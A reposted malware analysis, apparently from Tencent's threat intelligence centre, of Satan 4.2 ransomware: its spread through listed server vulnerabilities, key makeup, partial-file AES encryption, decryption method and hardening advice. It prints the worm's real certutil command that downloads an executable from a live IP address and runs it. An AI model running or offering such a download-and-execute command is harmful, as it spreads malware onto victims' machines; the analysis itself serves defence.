【轉載】撒旦（Satan 4.2）勒索病毒最新變種加解密分析

【轉載】原文來自：https://bbs.kafan.cn/thread-2135007-1-1.html

1、概述

近日，騰訊御見威脅情報中心檢測到一大批的服務器被入侵，入侵後被植入勒索病毒。通過分析確認，植入的勒索病毒爲最新的Satan 4.2勒索病毒。

<ignore_js_op>

御見威脅情報中心長期跟蹤撒旦（Satan）勒索病毒的變化，並屢次對外發布過撒旦（Satan）勒索病毒的分析文章。本次捕捉到的最新變種4.2版，傳播方式跟以前的版本並未有太多的變化，可是加密部分發生了變化，會致使以前版本的解密工具失效。

經過技術分析確認，撒旦（Satan）勒索病毒4.2變種將密鑰硬編碼在病毒及加密後的文件中，所以被撒旦（Satan）勒索病毒加密的文件能夠被解密。騰訊御見威脅中心已緊急更新瞭解密程序，供被勒索的用戶恢復被加密的文件。受害用戶只須啓動騰訊電腦管家中的「文檔守護者」，點擊文檔解密，便可根據提示修復被撒旦（Satan）勒索病毒加密的文檔。

2、 傳播分析

新捕捉到的樣本，傳播部分跟以前變化不大，依然集成了利用各類漏洞（包括永恆之藍和其餘服務器組件的漏洞）來進行攻擊傳播。攻擊示意圖以下：

<ignore_js_op>

撒旦（Satan）勒索病毒利用的漏洞工具包括：

l  永恆之藍

l  JBoss反序列化漏洞（CVE-2017-12149）

l  JBoss默認配置漏洞（CVE-2010-0738）

l  Tomcat任意文件上傳漏洞（CVE-2017-12615）

l  Tomcatweb管理後臺弱口令爆破

l  WeblogicWLS 組件漏洞（CVE-2017-10271）

具體的掃描和入侵部分分析請參見以前的分析文章《撒旦（Satan）勒索蠕蟲最新變種攻擊方式解析》。

入侵成功後，會執行命令行下載病毒文件，繼續掃描和入侵其餘的機器並執行勒索病毒。執行的命令行爲：

cmd.exe /c certutil.exe -urlcache -split -fhttp://45.77.175.225/cab/sts.exe c:/dbg.exe&&cmd.exe /c  c:/dbg.exe

3、 勒索病毒加解密分析

本次的變種變化較大的爲勒索病毒的加密部分，所以本文着重介紹下最新變種的加密算法部分。

一、 加密密鑰的組成變化

Satan 3.1 的加密密鑰組成爲：[HardWareID]+[STR]+[PUBLIC]

Satan 3.3 的加密密鑰組成爲：[HardWareID]+[HEX_STR]+[PUBLIC]

而最新的Satan 4.2的加密密鑰組成爲：[HardWareID]+[PUBLIC]+[HEX_STR]+[STR]

不只密鑰的組成因子變多，且順序跟以前也發生了改變。

新版的密鑰組成：

<ignore_js_op>

其中，[HardWareID]和[PUBLIC]會被隨機計算出來，而且會寫在被加密的文件尾部。

<ignore_js_op>

而HEX_STR和STR則是硬編碼在病毒的加密部分中：

<ignore_js_op>

二、 加密算法的變化

跟舊版撒旦（Satan）勒索病毒同樣，最新4.2版的撒旦（Satan）勒索病毒爲了加快加密速度，依然會對不一樣大小和不一樣文件類型的文件採起不一樣的加密策略，不一樣的是加密的方法再也不是前二分之1、前五分之一。最新的加密方式以下：

病毒會根據文件的後綴名進行徹底加密和不徹底加密，當文件後綴名符合規定的後綴名時採起徹底加密。相關後綴名以下：

"txt", "sql","zip", "php", "asp", "jsp","cpp", "ini", "aspx", "cs","py", "h", "vbs", "bat","conf", "sh", "inc", "e","c", "pl", "csv", "asm","doc", "docx", "xls", "xlsx","ppt"

當文件的後綴名不符合規定的文件名時，則根據文件大小進行加密：

1） 當文件大小大於100000000字節時，則採起每加密16字節後則隨後的4x16字節不加密；

2） 當文件大小小於等於100000000字節時，則採起每加密16字節後隨後的16字節不加密。

好比文件大小小於100000000字節的rar文件，被加密後的文件內容狀況以下：

<ignore_js_op>

這種加密方式雖然加密的方法和舊版本不一樣，可是一樣作到了加密總體文件的二分之1、五分之一。

而最後採用的加密算法再也不是舊版本中使用的RC4加密算法，而是AES256 ECB加密。

<ignore_js_op>

加密後在目錄下生成解密提示文本內容以下：

 

<ignore_js_op>

加密後的文件名變爲[sicck@protonmail.com]文件名.sicck：

<ignore_js_op>

至於解密部分，因爲AES256是對稱加密算法，而密鑰組成部分硬編碼在病毒文件和加密後的文件中，所以撒旦（Satan）勒索病毒徹底能夠被解密。解密方法只要從加密後文件的末尾提取HardWareID和PUBLIC，而後在病毒體中提取的HEX_STR和STR，組成AES256的key，便可用來解密加密後的文件。

而騰訊御點和騰訊電腦管家也更新了Satan的解密工具，使用騰訊電腦管家文檔守護者中的文檔解密功能便可解密成功。

<ignore_js_op>

如有中該勒索病毒的用戶和沒法使用該工具解密的用戶，請聯繫咱們官方人員，協助進行解密。

<ignore_js_op>

 

4、安全建議

騰訊御見威脅情報中心提醒用戶注意如下幾點：

一、        服務器關閉沒必要要的端口，方法可參考： https://guanjia.qq.com/web_clinic/s8/585.html

二、        使用騰訊御點（我的用戶可以使用騰訊電腦管家）的漏洞修復功能，及時修復系統高危漏洞；

三、        服務器使用高強度密碼，切勿使用弱口令，防止黑客暴力破解；

四、        推薦企業用戶使用騰訊御點（下載地址： https://s.tencent.com/product/yd/index.html），我的用戶使用騰訊電腦管家，攔截可能的病毒攻擊。

<ignore_js_op>